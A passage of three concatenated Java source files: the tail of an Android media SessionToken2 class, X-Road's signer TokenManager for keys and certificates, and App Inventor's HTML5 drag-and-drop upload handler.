equals(Object obj) { if (!(obj instanceof SessionToken2)) { return false; } SessionToken2 other = (SessionToken2) obj; return mUid == other.mUid && TextUtils.equals(mPackageName, other.mPackageName) && TextUtils.equals(mServiceName, other.mServiceName) && TextUtils.equals(mId, other.mId) && mType == other.mType; } @Override public String toString() { return "SessionToken {pkg=" + mPackageName + " id=" + mId + " type=" + mType + " service=" + mServiceName + " sessionCompatToken=" + mSessionCompatToken + "}"; } /** * @return uid of the session */ public int getUid() { return mUid; } /** * @return package name */ public @NonNull String getPackageName() { return mPackageName; } /** * @return service name. Can be {@code null} for TYPE_SESSION. */ public @Nullable String getServiceName() { return mServiceName; } /** * @hide * @return component name of this session token. Can be null for TYPE_SESSION. */ @RestrictTo(LIBRARY_GROUP) public ComponentName getComponentName() { return mComponentName; } /** * @return id */ public String getId() { return mId; } /** * @return type of the token * @see #TYPE_SESSION */ public @TokenType int getType() { return mType; } /** * Create a token from the bundle, exported by {@link #toBundle()}. * * @param bundle * @return */ public static SessionToken2 fromBundle(@NonNull Bundle bundle) { if (bundle == null) { return null; } final int uid = bundle.getInt(KEY_UID); final @TokenType int type = bundle.getInt(KEY_TYPE, -1); final String packageName = bundle.getString(KEY_PACKAGE_NAME); final String serviceName = bundle.getString(KEY_SERVICE_NAME); final String id = bundle.getString(KEY_ID); final MediaSessionCompat.Token token = bundle.getParcelable(KEY_SESSION_TOKEN); // Sanity check. switch (type) { case TYPE_SESSION: if (token == null) { throw new IllegalArgumentException("Unexpected token for session," + " SessionCompat.Token=" + token); } break; case TYPE_SESSION_SERVICE: case TYPE_LIBRARY_SERVICE: if (TextUtils.isEmpty(serviceName)) { throw new IllegalArgumentException("Session service needs service name"); } break; default: throw new IllegalArgumentException("Invalid type"); } if (TextUtils.isEmpty(packageName) || id == null) { throw new IllegalArgumentException("Package name nor ID cannot be null."); } return new SessionToken2(uid, type, packageName, serviceName, id, token); } /** * Create a {@link Bundle} from this token to share it across processes. * @return Bundle */ public Bundle toBundle() { Bundle bundle = new Bundle(); bundle.putInt(KEY_UID, mUid); bundle.putString(KEY_PACKAGE_NAME, mPackageName); bundle.putString(KEY_SERVICE_NAME, mServiceName); bundle.putString(KEY_ID, mId); bundle.putInt(KEY_TYPE, mType); bundle.putParcelable(KEY_SESSION_TOKEN, mSessionCompatToken); return bundle; } /** * @hide */ @RestrictTo(LIBRARY_GROUP) public static String getSessionId(ResolveInfo resolveInfo) { if (resolveInfo == null || resolveInfo.serviceInfo == null) { return null; } else if (resolveInfo.serviceInfo.metaData == null) { return ""; } else { return resolveInfo.serviceInfo.metaData.getString( MediaSessionService2.SERVICE_META_DATA, ""); } } MediaSessionCompat.Token getSessionCompatToken() { return mSessionCompatToken; } private static String getSessionIdFromService(PackageManager manager, String serviceInterface, ComponentName serviceComponent) { Intent serviceIntent = new Intent(serviceInterface); // Use queryIntentServices to find services with MediaLibraryService2.SERVICE_INTERFACE. // We cannot use resolveService with intent specified class name, because resolveService // ignores actions if Intent.setClassName() is specified. serviceIntent.setPackage(serviceComponent.getPackageName()); List<ResolveInfo> list = manager.queryIntentServices( serviceIntent, PackageManager.GET_META_DATA); if (list != null) { for (int i = 0; i < list.size(); i++) { ResolveInfo resolveInfo = list.get(i); if (resolveInfo == null || resolveInfo.serviceInfo == null) { continue; } if (TextUtils.equals( resolveInfo.serviceInfo.name, serviceComponent.getClassName())) { return getSessionId(resolveInfo); } } } return null; } }
/** * The MIT License * Copyright (c) 2015 Estonian Information System Authority (RIA), Population Register Centre (VRK) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ package ee.ria.xroad.signer.tokenmanager; import ee.ria.xroad.common.CodedException; import ee.ria.xroad.common.identifier.ClientId; import ee.ria.xroad.signer.model.Cert; import ee.ria.xroad.signer.model.CertRequest; import ee.ria.xroad.signer.model.Key; import ee.ria.xroad.signer.model.Token; import ee.ria.xroad.signer.protocol.dto.CertRequestInfo; import ee.ria.xroad.signer.protocol.dto.CertificateInfo; import ee.ria.xroad.signer.protocol.dto.KeyInfo; import ee.ria.xroad.signer.protocol.dto.KeyUsageInfo; import ee.ria.xroad.signer.protocol.dto.TokenInfo; import ee.ria.xroad.signer.protocol.dto.TokenStatusInfo; import ee.ria.xroad.signer.tokenmanager.merge.MergeOntoFileTokensStrategy; import ee.ria.xroad.signer.tokenmanager.merge.TokenMergeAddedCertificatesListener; import ee.ria.xroad.signer.tokenmanager.merge.TokenMergeStrategy; import ee.ria.xroad.signer.tokenmanager.merge.TokenMergeStrategy.MergeResult; import ee.ria.xroad.signer.tokenmanager.module.SoftwareModuleType; import ee.ria.xroad.signer.tokenmanager.token.TokenType; import ee.ria.xroad.signer.util.SignerUtil; import ee.ria.xroad.signer.util.TokenAndKey; import lombok.extern.slf4j.Slf4j; import org.bouncycastle.cert.ocsp.OCSPResp; import java.security.cert.X509Certificate; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.function.BiFunction; import java.util.function.Function; import java.util.stream.Collectors; import static ee.ria.xroad.common.ErrorCodes.X_WRONG_CERT_USAGE; import static ee.ria.xroad.signer.util.ExceptionHelper.certWithIdNotFound; import static ee.ria.xroad.signer.util.ExceptionHelper.keyNotFound; import static ee.ria.xroad.signer.util.ExceptionHelper.tokenNotFound; import static java.util.Collections.unmodifiableList; /** * Manages the current state of tokens, their keys and certificates. */ @Slf4j public final class TokenManager { private static volatile List<Token> currentTokens = new ArrayList<>(); private static boolean initialized; // configure the implementation somewhere else if multiple implementations created private static TokenMergeStrategy mergeStrategy = new MergeOntoFileTokensStrategy(); private TokenManager() { } /** * Initializes the manager -- loads the tokens from the token configuration. * * @throws Exception if an error occurs */ public static void init() throws Exception { try { TokenConf.getInstance().load(); } catch (Exception e) { log.error("Failed to load token conf", e); } currentTokens = new ArrayList<>(TokenConf.getInstance().getTokens()); initialized = true; } /** * Saves the current tokens to the configuration. * * @throws Exception if an error occurs */ public static synchronized void saveToConf() throws Exception { log.trace("persist()"); if (initialized) { TokenConf.getInstance().save(currentTokens); } } /** * Merge the in-memory configuration and the on-disk configuration if the configuration on * disk has changed. * @param listener */ public static void merge(TokenMergeAddedCertificatesListener listener) { if (TokenConf.getInstance().hasChanged()) { log.debug("The key configuration on disk has changed, merging changes."); List<Token> fileTokens; try { fileTokens = TokenConf.getInstance().retrieveTokensFromConf(); } catch (TokenConf.TokenConfException e) { log.error("Failed to load the new key configuration from disk.", e); return; } MergeResult result; synchronized (TokenManager.class) { result = mergeStrategy.merge(fileTokens, currentTokens); currentTokens = result.getResultTokens(); } if (listener != null) { listener.mergeDone(result.getAddedCertificates()); } log.info("Merged new key configuration."); } else { log.debug("The key configuration on disk has not changed, skipping merge."); } } // ------------------------------------------------------------------------ /** * @return list of tokens */ public static synchronized List<TokenInfo> listTokens() { return unmodifiableList( currentTokens.stream() .map(t -> t.toDTO()) .collect(Collectors.toList())); } /** * @param tokenId the token id * @return list of keys for a token */ public static List<KeyInfo> listKeys(String tokenId) { return unmodifiableList(findTokenInfo(tokenId).getKeyInfo()); } /** * Creates a new token with specified type. * * @param tokenType the type * @return the new token */ public static synchronized TokenInfo createToken(TokenType tokenType) { Token token = new Token(tokenType.getModuleType(), tokenType.getId(), tokenType.getSignMechanismName()); token.setModuleId(tokenType.getModuleType()); token.setReadOnly(tokenType.isReadOnly()); token.setSerialNumber(tokenType.getSerialNumber()); token.setLabel(tokenType.getLabel()); token.setSlotIndex(tokenType.getSlotIndex()); token.setFriendlyName(getDefaultFriendlyName(tokenType)); token.setBatchSigningEnabled(tokenType.isBatchSigningEnabled()); token.setAvailable(true); currentTokens.add(token); return token.toDTO(); } /** * @param tokenId the token id * @return the token info DTO for the token id or * throws exception if not found */ public static TokenInfo findTokenInfo(String tokenId) { TokenInfo tokenInfo = getTokenInfo(tokenId); if (tokenInfo != null) { return tokenInfo; } throw tokenNotFound(tokenId); } /** * @param tokenId the token id * @return the token info DTO for the token id or null of not found */ public static synchronized TokenInfo getTokenInfo(String tokenId) { log.trace("getTokenInfo({})", tokenId); return currentTokens.stream() .filter(t -> t.getId().equals(tokenId)) .map(t -> t.toDTO()) .findFirst().orElse(null); } /** * @param keyId the key id * @return the token and key or throws exception if not found */ public static synchronized TokenAndKey findTokenAndKey(String keyId) { log.trace("findTokenAndKey({})", keyId); return forKey((t, k) -> k.getId().equals(keyId), (t, k) -> new TokenAndKey(t.getId(), k.toDTO())) .orElseThrow(() -> keyNotFound(keyId)); } /** * @param keyId the key id * @return the token id for the key id or throws exception if not found */ public static synchronized String findTokenIdForKeyId(String keyId) { log.trace("findTokenIdForKeyId({})", keyId); return forKey((t, k) -> k.getId().equals(keyId), (t, k) -> t.getId()).orElseThrow(() -> keyNotFound(keyId)); } /** * @return the software token id */ public static synchronized String getSoftwareTokenId() { return forToken(t -> t.getType().equals(SoftwareModuleType.TYPE), t -> t.getId()).orElse(null); } /** * @param tokenId the token id * @return the module id for the token id or null if not found */ public static synchronized String getModuleId(String tokenId) { return forToken(t -> t.getId().equals(tokenId), t -> t.getModuleId()).orElse(null); } /** * @param keyId the key id * @return the key info for the key id or throws exception if not found */ public static KeyInfo findKeyInfo(String keyId) { KeyInfo keyInfo = getKeyInfo(keyId); if (keyInfo != null) { return keyInfo; } throw keyNotFound(keyId); } /** * @param keyId the key id * @return the key info for the key id or null if not found */ public static synchronized KeyInfo getKeyInfo(String keyId) { log.trace("getKeyInfo({})", keyId); return forKey((t, k) -> k.getId().equals(keyId), (t, k) -> k.toDTO()).orElse(null); } /** * @param clientId the client id * @return the list of keys for the given client id */ public static synchronized List<KeyInfo> getKeyInfo(ClientId clientId) { log.trace("getKeyInfo({})", clientId); List<KeyInfo> keyInfo = new ArrayList<>(); for (Token token : currentTokens) { if (!token.isActive() || !token.isAvailable()) { // Ignore inactive (not usable) tokens continue; } for (Key key : token.getKeys()) { if (!key.isAvailable() || key.getUsage() == KeyUsageInfo.AUTHENTICATION) { // Ignore authentication keys continue; } for (Cert cert : key.getCerts()) { if (!cert.isActive() || cert.getMemberId() == null) { // Ignore inactive and invalid certificates continue; } if (certBelongsToMember(cert.toDTO(), clientId)) { log.debug("Found key '{}' for client '{}'", key.getId(), cert.getMemberId()); keyInfo.add(key.toDTO()); } } } } return keyInfo; } /** * @param certId the certificate id * @return the certificate info for the certificate id or * throws exception if not found */ public static CertificateInfo findCertificateInfo(String certId) { CertificateInfo certificateInfo = getCertificateInfo(certId); if (certificateInfo != null) { return certificateInfo; } throw certWithIdNotFound(certId); } /** * @param certId the certificate id * @return the certificate info for the certificate id or null if not found */ public static synchronized CertificateInfo getCertificateInfo( String certId) { log.trace("getCertificateInfo({})", certId); return forCert((k, c) -> c.getId().equals(certId), (k, c) -> c.toDTO()) .orElse(null); } /** * @param certHash the certificate hash * @return the certificate info for the certificate hash or null */ public static synchronized CertificateInfo getCertificateInfoForCertHash( String certHash) { log.trace("getCertificateInfoForCertHash({})", certHash); return forCert((k, c) -> certHash.equals(c.getHash()), (k, c) -> c.toDTO()).orElse(null); } /** * @param certHash the certificate hash * @return the certificate for the certificate hash or null */ public static synchronized X509Certificate getCertificateForCertHash( String certHash) { log.trace("getCertificateForCertHash({})", certHash); return forCert((k, c) -> certHash.equals(c.getHash()), (k, c) -> c.getCertificate()).orElse(null); } /** * @return all certificates */ public static synchronized List<CertificateInfo> getAllCerts() { log.trace("getAllCerts()"); return currentTokens.stream() .flatMap(t -> t.getKeys().stream()) .flatMap(k -> k.getCerts().stream()) .map(c -> c.toDTO()) .collect(Collectors.toList()); } /** * Sets the OCSP response for the certificate. * * @param certHash the certificate hash * @param response the OCSP response */ public static synchronized void setOcspResponse(String certHash, OCSPResp response) { log.trace("setOcspResponse({})", certHash); forCert((k, c) -> certHash.equals(c.getHash()), (k, c) -> { c.setOcspResponse(response); return null; }); } /** * @param keyId the key id * @param memberId the member id * @return the certificate request info or null if not found */ public static synchronized CertRequestInfo getCertRequestInfo(String keyId, ClientId memberId) { log.trace("getCertRequestInfo({}, {})", keyId, memberId); Key key = findKey(keyId); return key.getCertRequests().stream() .filter(c -> key.getUsage() == KeyUsageInfo.AUTHENTICATION || memberId.equals(c.getMemberId())) .map(c -> c.toDTO()).findFirst().orElse(null); } /** * @param certHash the certificate hash * @return key info for the certificate hash */ public static synchronized KeyInfo getKeyInfoForCertHash(String certHash) { log.trace("getKeyInfoForCertHash({})", certHash); return forCert((k, c) -> certHash.equals(c.getHash()), (k, c) -> k.toDTO()).orElse(null); } /** * @param certId the certificate id * @return key info for certificate id */ public static synchronized KeyInfo getKeyInfoForCertId(String certId) { log.trace("getKeyInfoForCertId({})", certId); return forCert((k, c) -> c.getId().equals(certId), (k, c) -> k.toDTO()).orElse(null); } /** * @param certInfo the certificate info * @param member the member id * @return true if the cert belongs to the member */ public static boolean certBelongsToMember(CertificateInfo certInfo, ClientId member) { return member.equals(certInfo.getMemberId()) || member.subsystemContainsMember(certInfo.getMemberId()); } /** * @param tokenId the token id * @return true if token is available */ public static synchronized boolean isTokenAvailable(String tokenId) { log.trace("isTokenAvailable({})", tokenId); return findToken(tokenId).isAvailable(); } /** * @param tokenId the token id * @return true if token is active (logged in) */ public static synchronized boolean isTokenActive(String tokenId) { log.trace("isTokenActive({})", tokenId); return findToken(tokenId).isActive(); } /** * Sets the token available. * * @param tokenType the token type * @param available availability flag */ public static synchronized void setTokenAvailable(TokenType tokenType, boolean available) { String tokenId = tokenType.getId(); log.trace("setTokenAvailable({}, {})", tokenId, available); Token token = findToken(tokenId); token.setAvailable(available); token.setModuleId(tokenType.getModuleType()); } /** * Sets the token available. * * @param tokenId the token id * @param available availability flag */ public static synchronized void setTokenAvailable(String tokenId, boolean available) { log.trace("setTokenAvailable({}, {})", tokenId, available); findToken(tokenId).setAvailable(available); } /** * Sets the token active (logged in) or not * * @param tokenId the token id * @param active active flag */ public static synchronized void setTokenActive(String tokenId, boolean active) { log.trace("setTokenActive({}, {})", tokenId, active); findToken(tokenId).setActive(active); } /** * Sets the token friendly name. * * @param tokenId token id * @param friendlyName the friendly name */ public static synchronized void setTokenFriendlyName(String tokenId, String friendlyName) { log.trace("setTokenFriendlyName({}, {})", tokenId, friendlyName); findToken(tokenId).setFriendlyName(friendlyName); } /** * @param tokenId the token if * @return the token status info */ public static synchronized TokenStatusInfo getTokenStatus(String tokenId) { log.trace("getTokenStatus({})", tokenId); return findToken(tokenId).getStatus(); } /** * Sets the token status info * * @param tokenId the token id * @param status the status */ public static synchronized void setTokenStatus(String tokenId, TokenStatusInfo status) { log.trace("setTokenStatus({}, {})", tokenId, status); findToken(tokenId).setStatus(status); } /** * Sets the key availability. * * @param keyId the key id * @param available true if available */ public static synchronized void setKeyAvailable(String keyId, boolean available) { log.trace("setKeyAvailable({}, {})", keyId, available); findKey(keyId).setAvailable(available); } /** * @param keyId the key id * @return true if key is available */ public static synchronized boolean isKeyAvailable(String keyId) { log.trace("isKeyAvailable()"); return findKey(keyId).isAvailable(); } /** * Sets the key friendly name. * * @param keyId the key id * @param friendlyName the friendly name */ public static synchronized void setKeyFriendlyName(String keyId, String friendlyName) { log.trace("setKeyFriendlyName({}, {})", keyId, friendlyName); findKey(keyId).setFriendlyName(friendlyName); } /** * Sets the key label. * * @param keyId the key id * @param label the label */ public static synchronized void setKeyLabel(String keyId, String label) { log.trace("setKeyLabel({}, {})", keyId, label); findKey(keyId).setLabel(label); } /** * Sets the key usage. * * @param keyId the key id * @param keyUsage the key usage */ public static synchronized void setKeyUsage(String keyId, KeyUsageInfo keyUsage) { log.trace("setKeyUsage({}, {})", keyId, keyUsage); findKey(keyId).setUsage(keyUsage); } /** * Adds a key with id and base64 public key to a token. * * @param tokenId the token id * @param keyId the key if * @param publicKeyBase64 the public key base64 * @return the key info or throws exception if the token cannot be found */ public static synchronized KeyInfo addKey(String tokenId, String keyId, String publicKeyBase64) { log.trace("addKey({}, {})", tokenId, keyId); Token token = findToken(tokenId); Key key = new Key(token, keyId); key.setPublicKey(publicKeyBase64); token.addKey(key); return key.toDTO(); } /** * Removes a key with key id. * * @param keyId the key id * @return true if key was removed */ public static synchronized boolean removeKey(String keyId) { log.trace("removeKey({})", keyId); return forKey((t, k) -> k.getId().equals(keyId), (t, k) -> t.getKeys().remove(k)).orElse(false); } /** * Sets the public key for a key. * * @param keyId the key id * @param publicKeyBase64 the public key base64 */ public static synchronized void setPublicKey(String keyId, String publicKeyBase64) { log.trace("setPublicKey({}, {})", keyId, publicKeyBase64); findKey(keyId).setPublicKey(publicKeyBase64); } /** * Adds a certificate to a key. Throws exception, if key cannot be found. * * @param keyId the key id * @param certBytes the certificate bytes */ public static synchronized void addCert(String keyId, byte[] certBytes) { log.trace("addCert({})", keyId); Key key = findKey(keyId); Cert cert = new Cert(SignerUtil.randomId()); cert.setCertificate(certBytes); key.addCert(cert); } /** * Adds a certificate to a key. Throws exception, if key cannot be found. * * @param keyId the key id * @param certInfo the certificate info */ public static synchronized void addCert(String keyId, CertificateInfo certInfo) { log.trace("addCert({})", keyId); Key key = findKey(keyId); Cert cert = new Cert(certInfo.getId()); cert.setActive(certInfo.isActive()); cert.setCertificate(certInfo.getCertificateBytes()); cert.setOcspResponse(certInfo.getOcspBytes()); cert.setMemberId(certInfo.getMemberId()); cert.setSavedToConfiguration(certInfo.isSavedToConfiguration()); cert.setStatus(certInfo.getStatus()); key.addCert(cert); } /** * Sets the certificate active status. * * @param certId the certificate id * @param active true if active */ public static synchronized void setCertActive(String certId, boolean active) { log.trace("setCertActive({}, {})", certId, active); findCert(certId).setActive(active); } /** * Sets the certificate status. * * @param certId the certificate id * @param status the status */ public static synchronized void setCertStatus(String certId, String status) { log.trace("setCertStatus({}, {})", certId, status); findCert(certId).setStatus(status); } /** * Removes certificate with given id. * * @param certId the certificate id * @return true if certificate was removed */ public static synchronized boolean removeCert(String certId) { log.trace("removeCert({})", certId); return forCert((k, c) -> c.getId().equals(certId), (k, c) -> k.getCerts().remove(c)).orElse(false); } /** * Adds a new certificate request to a key. * * @param keyId the key id * @param memberId the member id * @param subjectName the sbject name * @param keyUsage the key usage * @return certificate id */ public static synchronized String addCertRequest(String keyId, ClientId memberId, String subjectName, KeyUsageInfo keyUsage) { log.trace("addCertRequest({}, {})", keyId, memberId); Key key = findKey(keyId); if (key.getUsage() != null && key.getUsage() != keyUsage) { throw CodedException.tr(X_WRONG_CERT_USAGE, "cert_request_wrong_usage", "Cannot add %s certificate request to %s key", keyUsage, key.getUsage()); } key.setUsage(keyUsage); for (CertRequest certRequest : key.getCertRequests()) { ClientId crMember = certRequest.getMemberId(); String crSubject = certRequest.getSubjectName(); if ((memberId == null && crSubject.equalsIgnoreCase(subjectName)) || (memberId != null && memberId.equals(crMember) && crSubject.equalsIgnoreCase(subjectName))) { log.warn("Certificate request (memberId: {}, " + "subjectName: {}) already exists", memberId, subjectName); return certRequest.getId(); } } String certId = SignerUtil.randomId(); key.addCertRequest(new CertRequest(certId, memberId, subjectName)); log.info("Added new certificate request (memberId: {}, " + "subjectId: {}) under key {}", new Object[]{memberId, subjectName, keyId}); return certId; } /** * Removes a certificate request with given id. * * @param certReqId the certificate request id * @return key id from which the certificate request was removed */ public static synchronized String removeCertRequest(String certReqId) { log.trace("removeCertRequest({})", certReqId); return forCertRequest((k, c) -> c.getId().equals(certReqId), (k, c) -> { if (k.getUsage() == KeyUsageInfo.AUTHENTICATION) { // Authentication keys can only have one certificate request k.getCertRequests().clear(); } else { if (!k.getCertRequests().remove(c)) { return null; } } return k.getId(); }).orElse(null); } /** * Sets the token info for the token. * * @param tokenId the token id * @param info the token info */ public static synchronized void setTokenInfo(String tokenId, Map<String, String> info) { findToken(tokenId).setInfo(info); } /** * @param tokenId the token id * @return true if batch signing is enabled for a token */ public static synchronized boolean isBatchSigningEnabled(String tokenId) { log.trace("isBatchSigningEnabled({})", tokenId); return findToken(tokenId).isBatchSigningEnabled(); } // ------------------------------------------------------------------------ private static <T> Optional<T> forToken(Function<Token, Boolean> tester, Function<Token, T> mapper) { for (Token token : currentTokens) { if (tester.apply(token)) { return Optional.ofNullable(mapper.apply(token)); } } return Optional.empty(); } private static <T> Optional<T> forKey( BiFunction<Token, Key, Boolean> tester, BiFunction<Token, Key, T> mapper) { for (Token token : currentTokens) { for (Key key : token.getKeys()) { if (tester.apply(token, key)) { return Optional.ofNullable(mapper.apply(token, key)); } } } return Optional.empty(); } private static <T> Optional<T> forCert( BiFunction<Key, Cert, Boolean> tester, BiFunction<Key, Cert, T> mapper) { for (Token token : currentTokens) { for (Key key : token.getKeys()) { for (Cert cert : key.getCerts()) { if (tester.apply(key, cert)) { return Optional.ofNullable(mapper.apply(key, cert)); } } } } return Optional.empty(); } private static <T> Optional<T> forCertRequest( BiFunction<Key, CertRequest, Boolean> tester, BiFunction<Key, CertRequest, T> mapper) { for (Token token : currentTokens) { for (Key key : token.getKeys()) { for (CertRequest certReq : key.getCertRequests()) { if (tester.apply(key, certReq)) { return Optional.ofNullable(mapper.apply(key, certReq)); } } } } return Optional.empty(); } private static Token findToken(String tokenId) { log.trace("findToken({})", tokenId); return forToken(t -> t.getId().equals(tokenId), t -> t) .orElseThrow(() -> tokenNotFound(tokenId)); } private static Key findKey(String keyId) { log.trace("findKey({})", keyId); return forKey((t, k) -> k.getId().equals(keyId), (t, k) -> k) .orElseThrow(() -> keyNotFound(keyId)); } private static Cert findCert(String certId) { log.trace("findCert({})", certId); return forCert((k, c) -> c.getId().equals(certId), (k, c) -> c) .orElseThrow(() -> certWithIdNotFound(certId)); } private static String getDefaultFriendlyName(TokenType tokenType) { String name = tokenType.getModuleType(); if (tokenType.getSerialNumber() != null) { name += "-" + tokenType.getSerialNumber(); } if (tokenType.getLabel() != null) { name += "-" + tokenType.getLabel(); } if (tokenType.getSlotIndex() != null) { name += "-" + tokenType.getSlotIndex(); } return name; } }
// -*- mode: java; c-basic-offset: 2; -*- // Copyright 2017-2020 MIT, All rights reserved // Released under the Apache License, Version 2.0 // http://www.apache.org/licenses/LICENSE-2.0 package com.google.appinventor.client.utils; import com.google.appinventor.client.ErrorReporter; import com.google.appinventor.client.Ode; import com.google.appinventor.client.OdeAsyncCallback; import com.google.appinventor.client.editor.youngandroid.YaBlocksEditor; import com.google.appinventor.client.explorer.project.Project; import com.google.appinventor.client.wizards.ComponentImportWizard.ImportComponentCallback; import com.google.appinventor.shared.rpc.UploadResponse; import com.google.appinventor.shared.rpc.project.UserProject; import com.google.appinventor.shared.rpc.project.youngandroid.YoungAndroidAssetNode; import com.google.appinventor.shared.rpc.project.youngandroid.YoungAndroidProjectNode; import com.google.appinventor.shared.storage.StorageUtil; import com.google.gwt.core.client.GWT; import com.google.gwt.event.dom.client.ClickEvent; import com.google.gwt.event.dom.client.ClickHandler; import com.google.gwt.query.client.builders.JsniBundle; import com.google.gwt.user.client.Window; import com.google.gwt.user.client.ui.Button; import com.google.gwt.user.client.ui.DialogBox; import com.google.gwt.user.client.ui.DockPanel; import com.google.gwt.user.client.ui.Label; import com.google.gwt.user.client.ui.VerticalPanel; import jsinterop.annotations.JsFunction; import static com.google.appinventor.client.Ode.MESSAGES; /** * HTML5DragDrop implements support for dragging projects/extensions/assets from the developer's * computer into the browser and dropping them onto the workspace. Depending on the extension of * the file, one of uploadProject(), uploadExtension(), or uploadMedia() is called to trigger an * import of the dropped entity. * * Compatibility * ------------- * * According to Mozilla, HTML5 Drag and Drop support is available starting in the following * browser versions: * * Chrome: 4 * Edge: (always) * Firefox: 3.5 * IE: 10 * Opera: 12 * Safari: 3.1 */ public final class HTML5DragDrop { interface HTML5DragDropSupport extends JsniBundle { @LibrarySource("html5dnd.js") void init(); } @JsFunction public interface ConfirmCallback { void run(); } public static void init() { ((HTML5DragDropSupport) GWT.create(HTML5DragDropSupport.class)).init(); initJsni(); } private static native void initJsni()/*-{ top.HTML5DragDrop_isProjectEditorOpen = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::isProjectEditorOpen()); top.HTML5DragDrop_getOpenProjectId = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::getOpenProjectId()); top.HTML5DragDrop_handleUploadResponse = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::handleUploadResponse(*)); top.HTML5DragDrop_reportError = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::reportError(*)); top.HTML5DragDrop_confirmOverwriteKey = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::confirmOverwriteKey(*)); top.HTML5DragDrop_confirmOverwriteAsset = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::confirmOverwriteAsset(*)); top.HTML5DragDrop_isBlocksEditorOpen = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::isBlocksEditorOpen()); }-*/; public static boolean isProjectEditorOpen() { return Ode.getInstance().getCurrentView() == 0; } public static boolean isBlocksEditorOpen() { return isProjectEditorOpen() && Ode.getInstance().getCurrentFileEditor() instanceof YaBlocksEditor; } public static String getOpenProjectId() { return Long.toString(Ode.getInstance().getCurrentYoungAndroidProjectId()); } protected static void reportError(int errorCode) { switch (errorCode) { case 1: Window.alert("No project open to receive upload."); break; case 2: Window.alert("Uploading of APK files is not supported."); break; default: Window.alert("Unexpected HTTP error code: " + errorCode); } } protected static void confirmOverwriteKey(final ConfirmCallback callback) { Ode.getInstance().getUserInfoService().hasUserFile(StorageUtil.ANDROID_KEYSTORE_FILENAME, new OdeAsyncCallback<Boolean>(MESSAGES.uploadKeystoreError()) { @Override public void onSuccess(Boolean keystoreFileExists) { if (keystoreFileExists) { final DialogBox dialog = new DialogBox(false, true); dialog.setStylePrimaryName("ode-DialogBox"); dialog.setText("Confirm Overwrite..."); Button cancelButton = new Button(MESSAGES.cancelButton()); Button deleteButton = new Button(MESSAGES.overwriteButton()); DockPanel buttonPanel = new DockPanel(); buttonPanel.add(cancelButton, DockPanel.WEST); buttonPanel.add(deleteButton, DockPanel.EAST); VerticalPanel panel = new VerticalPanel(); Label label = new Label(); label.setText(MESSAGES.confirmOverwriteKeystore()); panel.add(label); panel.add(buttonPanel); dialog.add(panel); cancelButton.addClickHandler(new ClickHandler() { @Override public void onClick(ClickEvent event) { dialog.hide(); } }); deleteButton.addClickHandler(new ClickHandler() { @Override public void onClick(ClickEvent event) { dialog.hide(); callback.run(); } }); dialog.center(); dialog.show(); } else { callback.run(); } } }); } protected static void confirmOverwriteAsset(String _projectId, String name, final ConfirmCallback callback) { // Get the target project long projectId = Long.parseLong(_projectId); Project project = Ode.getInstance().getProjectManager().getProject(projectId); if (project == null) { // Project not open so we have nothing to do. return; } // Check if an asset already exists with the given name YoungAndroidProjectNode projectNode = (YoungAndroidProjectNode) project.getRootNode(); YoungAndroidAssetNode node = (YoungAndroidAssetNode) projectNode.getAssetsFolder().findNode("assets/" + name); if (node == null) { // No asset exists by that name so it is safe to upload. callback.run(); return; } // Ask user to confirm overwriting the asset // This currently uses the same mechanism as FileUploadWizard, but should be rewritten to use a // dialog at some point. if (Window.confirm(MESSAGES.confirmOverwrite(name, name))) { callback.run(); } } protected static void handleUploadResponse(String _projectId, String type, String name, String body) { Ode ode = Ode.getInstance(); UploadResponse response = UploadResponse.extractUploadResponse(body); if (response != null) { switch (response.getStatus()) { case SUCCESS: ErrorReporter.hide(); if ("project".equals(type)) { String info = response.getInfo(); UserProject userProject = UserProject.valueOf(info); Project uploadedProject = ode.getProjectManager().addProject(userProject); ode.openYoungAndroidProjectInDesigner(uploadedProject); } else if ("extension".equals(type)) { long projectId = Long.parseLong(_projectId); YoungAndroidProjectNode projectNode = (YoungAndroidProjectNode) ode.getProjectManager() .getProject(projectId).getRootNode(); ode.getComponentService().importComponentToProject(response.getInfo(), projectId, projectNode.getAssetsFolder().getFileId(), new ImportComponentCallback()); } else if ("asset".equals(type)) { long projectId = Long.parseLong(_projectId); ode.updateModificationDate(projectId, response.getModificationDate()); Project project = ode.getProjectManager().getProject(projectId); YoungAndroidProjectNode projectNode = (YoungAndroidProjectNode) project.getRootNode(); YoungAndroidAssetNode node = new YoungAndroidAssetNode(name, projectNode.getAssetsFolder().getFileId() + "/" + name); project.addNode(projectNode.getAssetsFolder(), node); } else if ("keystore".equals(type)) { Ode.getInstance().getTopToolbar().updateKeystoreFileMenuButtons(); } break; case FILE_TOO_LARGE: ErrorReporter.reportInfo(MESSAGES.fileTooLargeError()); break; case NOT_PROJECT_ARCHIVE: ErrorReporter.reportInfo(MESSAGES.notProjectArchiveError()); break; default: ErrorReporter.reportError(MESSAGES.fileUploadError()); } } else { ErrorReporter.reportError(MESSAGES.fileUploadError()); } } }